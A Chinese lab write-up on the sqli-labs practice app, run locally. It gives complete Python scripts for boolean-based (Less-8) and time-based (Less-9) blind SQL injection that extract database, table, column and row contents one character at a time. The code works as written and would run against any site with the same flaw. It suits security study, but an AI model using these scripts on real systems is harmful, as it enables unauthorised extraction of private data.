实验环境:
sqli-labs,小皮面板搭建,edge浏览器
apache:2.4.39,MySQL:5.7,PHP:5.39
Python(pycharm2023):3
less-8
布尔盲注:
1.我这里采用的是最简单的方式,直接用一串字符串逐个去查询
import requests

# Base URL of the sqli-labs Less-8 page (boolean-based blind injection lab).
# The payloads below only work because the page builds its SQL query from the
# raw `id` value; on the server side a prepared/parameterised statement is the
# fix that closes this injection point.
url = "http://localhost:8080/Less-8/"
param = "id"  # query-string parameter the payload is injected into


def getdatabase(url: str, param: str) -> str:
    """Recover the current database name one character at a time (boolean-based).

    For each position ``i`` (1..19) every candidate in ``chars`` is sent as a
    SUBSTRING comparison; the lab page contains "You are in..........." only
    when the injected condition is true, which is the boolean oracle used here.

    Args:
        url: Base URL of the vulnerable page; "?" and the payload are appended.
        param: Name of the injected query parameter.

    Returns:
        The characters recovered so far. The result is truncated if the real
        name is longer than 19 characters or contains a character outside
        ``chars``.
    """
    database = ""
    # Candidate alphabet; a character outside it (e.g. '-' or '$') is never
    # matched and ends the scan early.
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            # Trailing space after "--" matters for MySQL's comment syntax.
            payload = f"{param}=1' AND SUBSTRING((SELECT database()), {i}, 1) = '{char}' -- "
            # One HTTP request per candidate character, appended raw to the URL.
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                database += char
                break
        else:
            # for/else: no candidate matched at this position -> end of the
            # name (or an unsupported character); stop scanning.
            break
    return database


# Get table names
def gettable(url: str, param: str, database: str) -> list[str]:
    """Recover the table names of ``database`` via the same boolean oracle.

    GROUP_CONCAT packs every table name of the schema into one comma-separated
    string, which is then read character by character (positions 1..19 only,
    so a long list is cut off) and split on ',' at the end.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        database: Schema name recovered by ``getdatabase``; interpolated into
            the query as a quoted literal.

    Returns:
        The recovered names split on ','. If nothing was recovered the result
        is ``['']`` (``"".split(',')``), not an empty list.
    """
    tables = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(table_name) "
                       f"FROM information_schema.tables "
                       f"WHERE table_schema = '{database}'), {i}, 1) = '{char}' -- ")
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                tables += char
                break
        else:
            # No candidate matched at this position: stop scanning.
            break
    return tables.split(',')


# Get column names
def getcolumn(url: str, param: str, database: str, table: str) -> list[str]:
    """Recover the column names of ``database.table`` via the boolean oracle.

    Same scheme as ``gettable``: GROUP_CONCAT of the column names is read one
    character at a time (positions 1..19) and split on ','.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        database: Schema name, interpolated as a quoted literal.
        table: Table name, interpolated as a quoted literal.

    Returns:
        The recovered names split on ','; ``['']`` when nothing was recovered.
    """
    columns = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            payload = (f"{param}=1' AND SUBSTRING((SELECT GROUP_CONCAT(column_name) "
                       f"FROM information_schema.columns WHERE table_schema = '{database}' "
                       f"AND table_name = '{table}'), {i}, 1) = '{char}' -- ")
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                columns += char
                break
        else:
            # No candidate matched at this position: stop scanning.
            break
    return columns.split(',')


# Get a data value
def getresult(url: str, param: str, database: str, table: str, column: str) -> str:
    """Recover the first row's value of ``column`` from ``database.table``.

    ``LIMIT 1`` restricts the subquery to a single row; the value is read one
    character at a time (positions 1..19) through the boolean oracle.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        database: Schema name, interpolated unquoted as ``{database}.{table}``.
        table: Table name, interpolated unquoted.
        column: Column name, interpolated unquoted into the SELECT list.

    Returns:
        The recovered value, possibly truncated (19-character cap, limited
        alphabet).
    """
    result = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            payload = (f"{param}=1' AND SUBSTRING((SELECT {column} "
                       f"FROM {database}.{table} LIMIT 1), {i}, 1) = '{char}' -- ")
            response = requests.get(url + "?" + payload)
            if "You are in..........." in response.text:
                result += char
                break
        else:
            # No candidate matched at this position: stop scanning.
            break
    return result


if __name__ == "__main__":
    # Walk the chain database -> tables -> columns -> value. Only the first
    # table and the first column are followed (index 0), as the author notes.
    database = getdatabase(url, param)
    print(f"Database: {database}")
    tables = gettable(url, param, database)
    print(f"Tables: {tables}")
    table = tables[0]  # split() always yields at least [''], so no IndexError
    columns = getcolumn(url, param, database, table)
    print(f"Columns: {columns}")
    column = columns[0]
    result = getresult(url, param, database, table, column)
    print(f"Result: {result}")
tips:我这里没有考虑有多个表和字段的情况,只是简单地把布尔盲注的原理展示了出来。
时间盲注
less-9
时间盲注:
采用时间函数(sleep函数),通过判断每次查询是否存在时间差值来推断结果
import requests
import time


def time_based_blind_injection(url: str, param: str, payload: str) -> bool:
    """Send one payload and report whether the round trip exceeded 5 seconds.

    This is the timing oracle for the Less-9 lab: a payload whose injected
    condition is true makes the server SLEEP, which shows up as a slow
    response. The threshold is wall-clock time measured around the whole
    request, so network or server latency counts toward it and a slow but
    non-sleeping response can be misread as True.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        payload: Value placed after ``{param}=`` in the query string (raw).

    Returns:
        True if the request took more than 5 s, False otherwise.
    """
    start_time = time.time()
    full_url = f"{url}?{param}={payload}"
    response = requests.get(full_url)
    end_time = time.time()
    # NOTE: 5 s is a fixed threshold; callers pair it with SLEEP(5) or SLEEP(7).
    if end_time - start_time > 5:
        return True
    return False


def get_database(url: str, param: str) -> str:
    """Recover the current database name via the timing oracle.

    Each candidate character is tested with an IF(...) that sleeps 7 s on a
    match; positions 1..19 are scanned and each recovered character is
    printed as it is found.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.

    Returns:
        The recovered name (possibly truncated by the 19-character cap or the
        limited alphabet).
    """
    database = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            # SLEEP(7) here versus the 5 s threshold gives some slack against latency.
            payload = f"1' AND IF(SUBSTRING((SELECT database()), {i}, 1) = '{char}', SLEEP(7), 0) -- "
            if time_based_blind_injection(url, param, payload):
                database += char
                print(char)
                break
        else:
            # for/else: no candidate matched at this position -> stop scanning.
            break
    print(f"[+] Database name: {database}")
    return database


# Get a table name
def get_table(url: str, param: str, database: str) -> str:
    """Recover the first table name of ``database`` via the timing oracle.

    ``LIMIT 0,1`` selects only the first table of the schema; its name is read
    one character at a time (positions 1..19) using SLEEP(5) against the 5 s
    threshold, which leaves little margin for latency.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        database: Schema name recovered by ``get_database``, interpolated as a
            quoted literal.

    Returns:
        The recovered table name (possibly truncated).
    """
    table = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
                       f"WHERE table_schema='{database}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
            if time_based_blind_injection(url, param, payload):
                table += char
                print(f"[+] Found character: {char}")
                break
        else:
            # No candidate matched at this position: stop scanning.
            break
    print(f"[+] Table name: {table}")
    return table
# def get_tables(url, param, database):当表不止一个
# tables = []
# chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
# table_count = 1 # 从第一个表开始
# while True:
# table_name = ""
# for i in range(1, 20):
# for char in chars:
# payload = (f"1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables "
# f"WHERE table_schema='{database}' LIMIT {table_count - 1},1), {i}, 1) = '{char}', SLEEP(5), 0) -- ")
# if time_based_blind_injection(url, param, payload):
# table_name += char
# print(f"[+] table: {char}")
# break
# else:
# break
# if table_name:
# print(f"[+] Found table: {table_name}")
# tables.append(table_name)
# table_count += 1
# else:
# break
#
# return tables# 获取字段名
def get_column(url: str, param: str, table: str) -> str:
    """Recover the first column name of ``table`` via the timing oracle.

    The information_schema lookup filters on ``table_name`` only (no
    ``table_schema``), so if another schema has a table of the same name the
    ``LIMIT 0,1`` row could come from that schema instead.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        table: Table name, interpolated as a quoted literal.

    Returns:
        The recovered column name (possibly truncated).
    """
    column = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            payload = f"1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table}' LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "
            if time_based_blind_injection(url, param, payload):
                column += char
                print(f"[+] column: {char}")
                break
        else:
            # No candidate matched at this position: stop scanning.
            break
    print(f"[+] Column name: {column}")
    return column


def get_data(url: str, param: str, table: str, column: str) -> str:
    """Recover the first row's value of ``column`` in ``table`` via the timing oracle.

    ``table`` and ``column`` are interpolated unquoted into the subquery; no
    schema is given, so the lookup relies on the connection's current
    database.

    Args:
        url: Base URL of the vulnerable page.
        param: Name of the injected query parameter.
        table: Table name (unquoted in the query).
        column: Column name (unquoted in the query).

    Returns:
        The recovered value (possibly truncated). It is also printed.
    """
    data = ""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
    for i in range(1, 20):  # hard-coded ceiling: positions 1..19 only
        for char in chars:
            payload = f"1' AND IF(SUBSTRING((SELECT {column} FROM {table} LIMIT 0,1), {i}, 1) = '{char}', SLEEP(5), 0) -- "
            if time_based_blind_injection(url, param, payload):
                data += char
                print(f"[+] Found character: {char}")
                break
        else:
            # No candidate matched at this position: stop scanning.
            break
    print(f"[+] Data: {data}")
    return data


# Main entry point
if __name__ == "__main__":
    # Less-9 is the time-based blind injection lab; every step below is
    # skipped once a previous step returned an empty string.
    target_url = "http://localhost:8080/Less-9/"
    param = "id"
    database = get_database(target_url, param)
    if database:
        table = get_table(target_url, param, database)
        if table:
            column = get_column(target_url, param, table)
            if column:
                # Return value is discarded; get_data prints the result itself.
                get_data(target_url, param, table, column)
同样,这里没有考虑不止一个表或者列的情况。